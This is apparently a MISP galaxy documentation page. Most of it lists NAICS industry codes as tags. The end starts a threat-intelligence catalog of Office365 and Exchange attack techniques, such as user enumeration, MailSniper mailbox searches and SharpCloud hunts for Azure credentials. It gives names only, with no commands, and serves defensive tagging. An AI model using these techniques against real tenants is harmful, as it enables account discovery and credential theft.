  • parent-of: misp-galaxy:naics="813410" with estimative-language:likelihood-probability="likely"

81341

Civic and Social Organizations

The tag is: misp-galaxy:naics="81341"

81341 has relationships with:

  • child-of: misp-galaxy:naics="8134" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="813410" with estimative-language:likelihood-probability="likely"

813410

Civic and Social Organizations

The tag is: misp-galaxy:naics="813410"

813410 has relationships with:

  • child-of: misp-galaxy:naics="8134" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="81341" with estimative-language:likelihood-probability="likely"

8139

Business, Professional, Labor, Political, and Similar Organizations

The tag is: misp-galaxy:naics="8139"

8139 has relationships with:

  • child-of: misp-galaxy:naics="813" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="81391" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="813910" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="81392" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="813920" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="81393" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="813930" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="81394" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="813940" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="81399" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="813990" with estimative-language:likelihood-probability="likely"

81391

Business Associations

The tag is: misp-galaxy:naics="81391"

81391 has relationships with:

  • child-of: misp-galaxy:naics="8139" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="813910" with estimative-language:likelihood-probability="likely"

813910

Business Associations

The tag is: misp-galaxy:naics="813910"

813910 has relationships with:

  • child-of: misp-galaxy:naics="8139" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="81391" with estimative-language:likelihood-probability="likely"

81392

Professional Organizations

The tag is: misp-galaxy:naics="81392"

81392 has relationships with:

  • child-of: misp-galaxy:naics="8139" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="813920" with estimative-language:likelihood-probability="likely"

813920

Professional Organizations

The tag is: misp-galaxy:naics="813920"

813920 has relationships with:

  • child-of: misp-galaxy:naics="8139" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="81392" with estimative-language:likelihood-probability="likely"

81393

Labor Unions and Similar Labor Organizations

The tag is: misp-galaxy:naics="81393"

81393 has relationships with:

  • child-of: misp-galaxy:naics="8139" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="813930" with estimative-language:likelihood-probability="likely"

813930

Labor Unions and Similar Labor Organizations

The tag is: misp-galaxy:naics="813930"

813930 has relationships with:

  • child-of: misp-galaxy:naics="8139" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="81393" with estimative-language:likelihood-probability="likely"

81394

Political Organizations

The tag is: misp-galaxy:naics="81394"

81394 has relationships with:

  • child-of: misp-galaxy:naics="8139" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="813940" with estimative-language:likelihood-probability="likely"

813940

Political Organizations

The tag is: misp-galaxy:naics="813940"

813940 has relationships with:

  • child-of: misp-galaxy:naics="8139" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="81394" with estimative-language:likelihood-probability="likely"

81399

Other Similar Organizations (except Business, Professional, Labor, and Political Organizations)

The tag is: misp-galaxy:naics="81399"

81399 has relationships with:

  • child-of: misp-galaxy:naics="8139" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="813990" with estimative-language:likelihood-probability="likely"

813990

Other Similar Organizations (except Business, Professional, Labor, and Political Organizations)

The tag is: misp-galaxy:naics="813990"

813990 has relationships with:

  • child-of: misp-galaxy:naics="8139" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="81399" with estimative-language:likelihood-probability="likely"

814

Private Households

The tag is: misp-galaxy:naics="814"

814 has relationships with:

  • child-of: misp-galaxy:naics="81" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="8141" with estimative-language:likelihood-probability="likely"

8141

Private Households

The tag is: misp-galaxy:naics="8141"

8141 has relationships with:

  • child-of: misp-galaxy:naics="814" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="81411" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="814110" with estimative-language:likelihood-probability="likely"

81411

Private Households

The tag is: misp-galaxy:naics="81411"

81411 has relationships with:

  • child-of: misp-galaxy:naics="8141" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="814110" with estimative-language:likelihood-probability="likely"

814110

Private Households

The tag is: misp-galaxy:naics="814110"

814110 has relationships with:

  • child-of: misp-galaxy:naics="8141" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="81411" with estimative-language:likelihood-probability="likely"

92

Public Administration

The tag is: misp-galaxy:naics="92"

92 has relationships with:

  • parent-of: misp-galaxy:naics="921" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="922" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="923" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="924" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="925" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="926" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="927" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="928" with estimative-language:likelihood-probability="likely"

921

Executive, Legislative, and Other General Government Support

The tag is: misp-galaxy:naics="921"

921 has relationships with:

  • child-of: misp-galaxy:naics="92" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="9211" with estimative-language:likelihood-probability="likely"

9211

Executive, Legislative, and Other General Government Support

The tag is: misp-galaxy:naics="9211"

9211 has relationships with:

  • child-of: misp-galaxy:naics="921" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="92111" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="921110" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="92112" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="921120" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="92113" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="921130" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="92114" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="921140" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="92115" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="921150" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="92119" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="921190" with estimative-language:likelihood-probability="likely"

92111

Executive Offices

The tag is: misp-galaxy:naics="92111"

92111 has relationships with:

  • child-of: misp-galaxy:naics="9211" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="921110" with estimative-language:likelihood-probability="likely"

921110

Executive Offices

The tag is: misp-galaxy:naics="921110"

921110 has relationships with:

  • child-of: misp-galaxy:naics="9211" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="92111" with estimative-language:likelihood-probability="likely"

92112

Legislative Bodies

The tag is: misp-galaxy:naics="92112"

92112 has relationships with:

  • child-of: misp-galaxy:naics="9211" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="921120" with estimative-language:likelihood-probability="likely"

921120

Legislative Bodies

The tag is: misp-galaxy:naics="921120"

921120 has relationships with:

  • child-of: misp-galaxy:naics="9211" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="92112" with estimative-language:likelihood-probability="likely"

92113

Public Finance Activities

The tag is: misp-galaxy:naics="92113"

92113 has relationships with:

  • child-of: misp-galaxy:naics="9211" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="921130" with estimative-language:likelihood-probability="likely"

921130

Public Finance Activities

The tag is: misp-galaxy:naics="921130"

921130 has relationships with:

  • child-of: misp-galaxy:naics="9211" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="92113" with estimative-language:likelihood-probability="likely"

92114

Executive and Legislative Offices, Combined

The tag is: misp-galaxy:naics="92114"

92114 has relationships with:

  • child-of: misp-galaxy:naics="9211" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="921140" with estimative-language:likelihood-probability="likely"

921140

Executive and Legislative Offices, Combined

The tag is: misp-galaxy:naics="921140"

921140 has relationships with:

  • child-of: misp-galaxy:naics="9211" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="92114" with estimative-language:likelihood-probability="likely"

92115

American Indian and Alaska Native Tribal Governments

The tag is: misp-galaxy:naics="92115"

92115 has relationships with:

  • child-of: misp-galaxy:naics="9211" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="921150" with estimative-language:likelihood-probability="likely"

921150

American Indian and Alaska Native Tribal Governments

The tag is: misp-galaxy:naics="921150"

921150 has relationships with:

  • child-of: misp-galaxy:naics="9211" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="92115" with estimative-language:likelihood-probability="likely"

92119

Other General Government Support

The tag is: misp-galaxy:naics="92119"

92119 has relationships with:

  • child-of: misp-galaxy:naics="9211" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="921190" with estimative-language:likelihood-probability="likely"

921190

Other General Government Support

The tag is: misp-galaxy:naics="921190"

921190 has relationships with:

  • child-of: misp-galaxy:naics="9211" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="92119" with estimative-language:likelihood-probability="likely"

922

Justice, Public Order, and Safety Activities

The tag is: misp-galaxy:naics="922"

922 has relationships with:

  • child-of: misp-galaxy:naics="92" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="9221" with estimative-language:likelihood-probability="likely"

9221

Justice, Public Order, and Safety Activities

The tag is: misp-galaxy:naics="9221"

9221 has relationships with:

  • child-of: misp-galaxy:naics="922" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="92211" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="922110" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="92212" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="922120" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="92213" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="922130" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="92214" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="922140" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="92215" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="922150" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="92216" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="922160" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="92219" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="922190" with estimative-language:likelihood-probability="likely"

92211

Courts

The tag is: misp-galaxy:naics="92211"

92211 has relationships with:

  • child-of: misp-galaxy:naics="9221" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="922110" with estimative-language:likelihood-probability="likely"

922110

Courts

The tag is: misp-galaxy:naics="922110"

922110 has relationships with:

  • child-of: misp-galaxy:naics="9221" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="92211" with estimative-language:likelihood-probability="likely"

92212

Police Protection

The tag is: misp-galaxy:naics="92212"

92212 has relationships with:

  • child-of: misp-galaxy:naics="9221" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="922120" with estimative-language:likelihood-probability="likely"

922120

Police Protection

The tag is: misp-galaxy:naics="922120"

922120 has relationships with:

  • child-of: misp-galaxy:naics="9221" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="92212" with estimative-language:likelihood-probability="likely"

92213

Legal Counsel and Prosecution

The tag is: misp-galaxy:naics="92213"

92213 has relationships with:

  • child-of: misp-galaxy:naics="9221" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="922130" with estimative-language:likelihood-probability="likely"

922130

Legal Counsel and Prosecution

The tag is: misp-galaxy:naics="922130"

922130 has relationships with:

  • child-of: misp-galaxy:naics="9221" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="92213" with estimative-language:likelihood-probability="likely"

92214

Correctional Institutions

The tag is: misp-galaxy:naics="92214"

92214 has relationships with:

  • child-of: misp-galaxy:naics="9221" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="922140" with estimative-language:likelihood-probability="likely"

922140

Correctional Institutions

The tag is: misp-galaxy:naics="922140"

922140 has relationships with:

  • child-of: misp-galaxy:naics="9221" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="92214" with estimative-language:likelihood-probability="likely"

92215

Parole Offices and Probation Offices

The tag is: misp-galaxy:naics="92215"

92215 has relationships with:

  • child-of: misp-galaxy:naics="9221" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="922150" with estimative-language:likelihood-probability="likely"

922150

Parole Offices and Probation Offices

The tag is: misp-galaxy:naics="922150"

922150 has relationships with:

  • child-of: misp-galaxy:naics="9221" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="92215" with estimative-language:likelihood-probability="likely"

92216

Fire Protection

The tag is: misp-galaxy:naics="92216"

92216 has relationships with:

  • child-of: misp-galaxy:naics="9221" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="922160" with estimative-language:likelihood-probability="likely"

922160

Fire Protection

The tag is: misp-galaxy:naics="922160"

922160 has relationships with:

  • child-of: misp-galaxy:naics="9221" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="92216" with estimative-language:likelihood-probability="likely"

92219

Other Justice, Public Order, and Safety Activities

The tag is: misp-galaxy:naics="92219"

92219 has relationships with:

  • child-of: misp-galaxy:naics="9221" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="922190" with estimative-language:likelihood-probability="likely"

922190

Other Justice, Public Order, and Safety Activities

The tag is: misp-galaxy:naics="922190"

922190 has relationships with:

  • child-of: misp-galaxy:naics="9221" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="92219" with estimative-language:likelihood-probability="likely"

923

Administration of Human Resource Programs

The tag is: misp-galaxy:naics="923"

923 has relationships with:

  • child-of: misp-galaxy:naics="92" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="9231" with estimative-language:likelihood-probability="likely"

9231

Administration of Human Resource Programs

The tag is: misp-galaxy:naics="9231"

9231 has relationships with:

  • child-of: misp-galaxy:naics="923" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="92311" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="923110" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="92312" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="923120" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="92313" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="923130" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="92314" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="923140" with estimative-language:likelihood-probability="likely"

92311

Administration of Education Programs

The tag is: misp-galaxy:naics="92311"

92311 has relationships with:

  • child-of: misp-galaxy:naics="9231" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="923110" with estimative-language:likelihood-probability="likely"

923110

Administration of Education Programs

The tag is: misp-galaxy:naics="923110"

923110 has relationships with:

  • child-of: misp-galaxy:naics="9231" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="92311" with estimative-language:likelihood-probability="likely"

92312

Administration of Public Health Programs

The tag is: misp-galaxy:naics="92312"

92312 has relationships with:

  • child-of: misp-galaxy:naics="9231" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="923120" with estimative-language:likelihood-probability="likely"

923120

Administration of Public Health Programs

The tag is: misp-galaxy:naics="923120"

923120 has relationships with:

  • child-of: misp-galaxy:naics="9231" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="92312" with estimative-language:likelihood-probability="likely"

92313

Administration of Human Resource Programs (except Education, Public Health, and Veterans' Affairs Programs)

The tag is: misp-galaxy:naics="92313"

92313 has relationships with:

  • child-of: misp-galaxy:naics="9231" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="923130" with estimative-language:likelihood-probability="likely"

923130

Administration of Human Resource Programs (except Education, Public Health, and Veterans' Affairs Programs)

The tag is: misp-galaxy:naics="923130"

923130 has relationships with:

  • child-of: misp-galaxy:naics="9231" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="92313" with estimative-language:likelihood-probability="likely"

92314

Administration of Veterans' Affairs

The tag is: misp-galaxy:naics="92314"

92314 has relationships with:

  • child-of: misp-galaxy:naics="9231" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="923140" with estimative-language:likelihood-probability="likely"

923140

Administration of Veterans' Affairs

The tag is: misp-galaxy:naics="923140"

923140 has relationships with:

  • child-of: misp-galaxy:naics="9231" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="92314" with estimative-language:likelihood-probability="likely"

924

Administration of Environmental Quality Programs

The tag is: misp-galaxy:naics="924"

924 has relationships with:

  • child-of: misp-galaxy:naics="92" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="9241" with estimative-language:likelihood-probability="likely"

9241

Administration of Environmental Quality Programs

The tag is: misp-galaxy:naics="9241"

9241 has relationships with:

  • child-of: misp-galaxy:naics="924" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="92411" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="924110" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="92412" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="924120" with estimative-language:likelihood-probability="likely"

92411

Administration of Air and Water Resource and Solid Waste Management Programs

The tag is: misp-galaxy:naics="92411"

92411 has relationships with:

  • child-of: misp-galaxy:naics="9241" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="924110" with estimative-language:likelihood-probability="likely"

924110

Administration of Air and Water Resource and Solid Waste Management Programs

The tag is: misp-galaxy:naics="924110"

924110 has relationships with:

  • child-of: misp-galaxy:naics="9241" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="92411" with estimative-language:likelihood-probability="likely"

92412

Administration of Conservation Programs

The tag is: misp-galaxy:naics="92412"

92412 has relationships with:

  • child-of: misp-galaxy:naics="9241" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="924120" with estimative-language:likelihood-probability="likely"

924120

Administration of Conservation Programs

The tag is: misp-galaxy:naics="924120"

924120 has relationships with:

  • child-of: misp-galaxy:naics="9241" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="92412" with estimative-language:likelihood-probability="likely"

925

Administration of Housing Programs, Urban Planning, and Community Development

The tag is: misp-galaxy:naics="925"

925 has relationships with:

  • child-of: misp-galaxy:naics="92" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="9251" with estimative-language:likelihood-probability="likely"

9251

Administration of Housing Programs, Urban Planning, and Community Development

The tag is: misp-galaxy:naics="9251"

9251 has relationships with:

  • child-of: misp-galaxy:naics="925" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="92511" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="925110" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="92512" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="925120" with estimative-language:likelihood-probability="likely"

92511

Administration of Housing Programs

The tag is: misp-galaxy:naics="92511"

92511 has relationships with:

  • child-of: misp-galaxy:naics="9251" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="925110" with estimative-language:likelihood-probability="likely"

925110

Administration of Housing Programs

The tag is: misp-galaxy:naics="925110"

925110 has relationships with:

  • child-of: misp-galaxy:naics="9251" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="92511" with estimative-language:likelihood-probability="likely"

92512

Administration of Urban Planning and Community and Rural Development

The tag is: misp-galaxy:naics="92512"

92512 has relationships with:

  • child-of: misp-galaxy:naics="9251" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="925120" with estimative-language:likelihood-probability="likely"

925120

Administration of Urban Planning and Community and Rural Development

The tag is: misp-galaxy:naics="925120"

925120 has relationships with:

  • child-of: misp-galaxy:naics="9251" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="92512" with estimative-language:likelihood-probability="likely"

926

Administration of Economic Programs

The tag is: misp-galaxy:naics="926"

926 has relationships with:

  • child-of: misp-galaxy:naics="92" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="9261" with estimative-language:likelihood-probability="likely"

9261

Administration of Economic Programs

The tag is: misp-galaxy:naics="9261"

9261 has relationships with:

  • child-of: misp-galaxy:naics="926" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="92611" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="926110" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="92612" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="926120" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="92613" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="926130" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="92614" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="926140" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="92615" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="926150" with estimative-language:likelihood-probability="likely"

92611

Administration of General Economic Programs

The tag is: misp-galaxy:naics="92611"

92611 has relationships with:

  • child-of: misp-galaxy:naics="9261" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="926110" with estimative-language:likelihood-probability="likely"

926110

Administration of General Economic Programs

The tag is: misp-galaxy:naics="926110"

926110 has relationships with:

  • child-of: misp-galaxy:naics="9261" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="92611" with estimative-language:likelihood-probability="likely"

92612

Regulation and Administration of Transportation Programs

The tag is: misp-galaxy:naics="92612"

92612 has relationships with:

  • child-of: misp-galaxy:naics="9261" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="926120" with estimative-language:likelihood-probability="likely"

926120

Regulation and Administration of Transportation Programs

The tag is: misp-galaxy:naics="926120"

926120 has relationships with:

  • child-of: misp-galaxy:naics="9261" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="92612" with estimative-language:likelihood-probability="likely"

92613

Regulation and Administration of Communications, Electric, Gas, and Other Utilities

The tag is: misp-galaxy:naics="92613"

92613 has relationships with:

  • child-of: misp-galaxy:naics="9261" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="926130" with estimative-language:likelihood-probability="likely"

926130

Regulation and Administration of Communications, Electric, Gas, and Other Utilities

The tag is: misp-galaxy:naics="926130"

926130 has relationships with:

  • child-of: misp-galaxy:naics="9261" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="92613" with estimative-language:likelihood-probability="likely"

92614

Regulation of Agricultural Marketing and Commodities

The tag is: misp-galaxy:naics="92614"

92614 has relationships with:

  • child-of: misp-galaxy:naics="9261" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="926140" with estimative-language:likelihood-probability="likely"

926140

Regulation of Agricultural Marketing and Commodities

The tag is: misp-galaxy:naics="926140"

926140 has relationships with:

  • child-of: misp-galaxy:naics="9261" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="92614" with estimative-language:likelihood-probability="likely"

92615

Regulation, Licensing, and Inspection of Miscellaneous Commercial Sectors

The tag is: misp-galaxy:naics="92615"

92615 has relationships with:

  • child-of: misp-galaxy:naics="9261" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="926150" with estimative-language:likelihood-probability="likely"

926150

Regulation, Licensing, and Inspection of Miscellaneous Commercial Sectors

The tag is: misp-galaxy:naics="926150"

926150 has relationships with:

  • child-of: misp-galaxy:naics="9261" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="92615" with estimative-language:likelihood-probability="likely"

927

Space Research and Technology

The tag is: misp-galaxy:naics="927"

927 has relationships with:

  • child-of: misp-galaxy:naics="92" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="9271" with estimative-language:likelihood-probability="likely"

9271

Space Research and Technology

The tag is: misp-galaxy:naics="9271"

9271 has relationships with:

  • child-of: misp-galaxy:naics="927" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="92711" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="927110" with estimative-language:likelihood-probability="likely"

92711

Space Research and Technology

The tag is: misp-galaxy:naics="92711"

92711 has relationships with:

  • child-of: misp-galaxy:naics="9271" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="927110" with estimative-language:likelihood-probability="likely"

927110

Space Research and Technology

The tag is: misp-galaxy:naics="927110"

927110 has relationships with:

  • child-of: misp-galaxy:naics="9271" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="92711" with estimative-language:likelihood-probability="likely"

928

National Security and International Affairs

The tag is: misp-galaxy:naics="928"

928 has relationships with:

  • child-of: misp-galaxy:naics="92" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="9281" with estimative-language:likelihood-probability="likely"

9281

National Security and International Affairs

The tag is: misp-galaxy:naics="9281"

9281 has relationships with:

  • child-of: misp-galaxy:naics="928" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="92811" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="928110" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="92812" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="928120" with estimative-language:likelihood-probability="likely"

92811

National Security

The tag is: misp-galaxy:naics="92811"

92811 has relationships with:

  • child-of: misp-galaxy:naics="9281" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="928110" with estimative-language:likelihood-probability="likely"

928110

National Security

The tag is: misp-galaxy:naics="928110"

928110 has relationships with:

  • child-of: misp-galaxy:naics="9281" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="92811" with estimative-language:likelihood-probability="likely"

92812

International Affairs

The tag is: misp-galaxy:naics="92812"

92812 has relationships with:

  • child-of: misp-galaxy:naics="9281" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="928120" with estimative-language:likelihood-probability="likely"

928120

International Affairs

The tag is: misp-galaxy:naics="928120"

928120 has relationships with:

  • child-of: misp-galaxy:naics="9281" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="92812" with estimative-language:likelihood-probability="likely"

o365-exchange-techniques

o365-exchange-techniques - Office365/Exchange related techniques by @johnLaTwC and @inversecos.

o365-exchange-techniques is a cluster galaxy available in JSON format at this location The JSON format can be freely reused in your application or automatically enabled in MISP.
authors

John Lambert - Alexandre Dulaunoy - Lina Lau - Thomas Patzke

AAD - Dump users and groups with Azure AD

AAD - Dump users and groups with Azure AD

The tag is: misp-galaxy:cloud-security="AAD - Dump users and groups with Azure AD"

AAD - PowerShell

AAD - PowerShell

The tag is: misp-galaxy:cloud-security="AAD - PowerShell"

AAD - Enumerate Domains

AAD - Enumerate Domains

The tag is: misp-galaxy:cloud-security="AAD - Enumerate Domains"

AAD - Enumerate Users

AAD - Enumerate Users

The tag is: misp-galaxy:cloud-security="AAD - Enumerate Users"

O365 - Get Global Address List: MailSniper

O365 - Get Global Address List: MailSniper

The tag is: misp-galaxy:cloud-security="O365 - Get Global Address List: MailSniper"

O365 - Find Open Mailboxes: MailSniper

O365 - Find Open Mailboxes: MailSniper

The tag is: misp-galaxy:cloud-security="O365 - Find Open Mailboxes: MailSniper"

O365 - User account enumeration with ActiveSync

O365 - User account enumeration with ActiveSync

The tag is: misp-galaxy:cloud-security="O365 - User account enumeration with ActiveSync"

End Point - Search host for Azure Credentials: SharpCloud

End Point - Search host for Azure Credentials: SharpCloud

The tag is: misp-galaxy:cloud-security="End Point - Search host for Azure Credentials: SharpCloud"

On-Prem Exchange - Portal Recon

On-Prem Exchange - Portal Recon

The tag is: misp-galaxy:cloud-security="On-Prem Exchange - Portal Recon"

On-Prem Exchange - Enumerate domain accounts: using Skype4B

On-Prem Exchange - Enumerate domain accounts: using Skype4B

The tag is: misp-galaxy:cloud-security="On-Prem Exchange - Enumerate domain accounts: using Skype4B"

On-Prem Exchange - Enumerate domain accounts: OWA & Exchange

On-Prem Exchange - Enumerate domain accounts: OWA & Exchange

